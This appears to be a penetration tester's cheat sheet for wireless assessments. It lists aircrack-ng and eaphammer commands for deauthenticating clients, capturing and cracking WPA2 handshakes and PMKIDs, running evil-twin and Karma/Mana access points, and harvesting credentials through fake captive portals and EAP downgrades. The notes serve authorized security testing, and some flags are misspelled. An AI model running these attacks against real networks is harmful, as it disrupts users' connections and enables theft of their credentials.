wlan testing

Wireless Testing Methodology

special driver setup

• https://github.com/aircrack-ng/rtl8812au

wlan

• captive portals

  • check if you see other MAC addresses and if they work
  • check if there is client separation (prior to authentication)

• what are you expected to do?

  • assessment of a wireless networK?
  • WPA2 PSK
  • WPA2 Enterprise

• what to do

  • evalutate strength of PSK
  • review nearby networks
  • assessing guest network
  • chekcing network access

• wpa-ps2-exploit

$ airmon-ng check kill
$ airmon-ng start wlan0
$ iwconfig # -> check if there is a monitor mode
$ airodump-ng wlan0mon #`` check for networks
$ airodump-ng -c 6 --bssid bssid -w capture wlan0mon
 
# add deauth-attack to gather more handshakes
$ aireplay-ng -0 1 -a <access point essid> -c <client mac> wlan0mon
 
#crack those hashes
$ aircrack-ng -w <wordlist> -b <ap mac address> <capture-file>

introduction posts to read:

• https://foxglovesecurity.com/2016/02/24/when-whales-fly-building-a-wireless-pentest-environment-using-docker/

  • uses hostapd-wpe

• https://github.com/FluxionNetwork/fluxion

  • rogue ap attack

• https://github.com/derv82/wifite2

  • attack WIFI techniques, not fake AP

EAPHammer Posts

• https://medium.com/@s0lst1c3
• https://github.com/s0lst1c3/s0lst1c3.github.io/blob/master/workshops/advanced-wireless-attacks/index.md
• https://github.com/s0lst1c3/eaphammer/wiki/VI.-Attacking-802.11n-Networks
• https://github.com/s0lst1c3/eaphammer/wiki

notes

• rogue AP to install implants
• evil twin to attack wpa/2 eap/psk networks

# to attack psk network and get credentials
$ eaphammer -i wlan0 -e exampleCorp -c 1 --creds --auth wpa-psk
 
# to get credentials
$ eaphammer -i wlan0 -e exampleCorp --pmf enable --cloaking full --mana --auth wpa-eap --creds --mac-whitelist devices.txt --ssid-whitelist target.txt
$ for i in `cat devices.txt`; do aireplay-ng -0 5 -a xx -c $i; done

initial attacks

# create a fake captive portal
$ eaphammer -i wlan0 --essid exampleCorp --captive-portal
 
# deauth clients
$ nmcli device set wlan0 managed off
$ ifconfig wlan1 down
$ iwconfig wlan1 mode monitor
$ ifconfig wlan1 up
$ iwconfig wlan1 channel 1
$ aireplay-ng -0 0 -a xx -c xx wlan1

attacking active probing

Also known as Karma/Mana style attacks. Karma-style attacks are not supported by eaphammer anymore.

More or less the AP will answer to any incoming AP connection request.

# simple attack against macs in macstoattack.txt
$ eaphammer -i wlan0 -e seemslegit --cloaking full --captive-portal --mana --mac-whiteliste macstoattack.txt
 
# loud mode attack (assumes that PNL of nearby device intersects)
# add the `--loud` flag to respond with all essids
 
# known beacon: uses a wordlist for known essids
$ eaphammer -i wlan0 --mana -e apples --known-beacons --captive-portal --knwon-ssids oranges
# or: --known-ssids-file words.txt
 
# known beacon burst attacks will directly attack a single client
# 1. start epahammer with --mana
# 2. forge beacons to a client
$ forge-beacons -i wlan1 --bssid xx --known-essids-file know_ssids.txt --dst-adr xxx --burst-count 5

use managment frame ACLs for more targeted attacks

--mac-whitelist, --mac-blacklist, --ssid-whitelist, --ssid-blacklist

attacking WPA3/OWE

• opportunistic wireless encryption
• authentication vs. encryption → this is why we have open wireless networks still
• OWE adds encryption (through DH) to open networks
• OWE transition mode: 2 networks, 1 visible open network with link to OWE network in broadcast parameters, one hidden OWE network
• OWE only helps against passive sniffing attacks, not against evil-twin attacks (as there is no authentication)

eap attacks

# create new self-signed certificate
$ eaphammer --cert-wizard
 
# start the capture
$ eaphammer --bssid xx --essid networkname --channel 2 --wpa 2 --auth wpa-eap --interface wlan0 --creds
 
# use captured credentials to crack radius credentials
$ asleap -C challenge -R response -W wordlist
 
# perform downgrade attacks with `--eapdowngrade full` or `eap-downgrade gtc`
# use autoamtic cracking with `--autocrack`

hostile captive portal

# tries to get windows hashes
$ eaphammer --bssid xx -essid evilcrop --channel 6 --auth wpa-eap --hostile-portal

PMKID attack

$ eaphammer --pmkid --interface wlan0 --essid target

essid stripping

# try to force password re-entry
$ eaphammer -i wlan0 --auth wpa-eap --essid wifiAP --creds --negotiate balanced --essid-stripping '\r'

802.11n

--hw-mode n, together with --channel-width 20/40. Channel bonding will automatically used if channel width=40, otherwise can be configured through --th40 plus/minus/auto

other tools

• airmaggedon
• eaphammer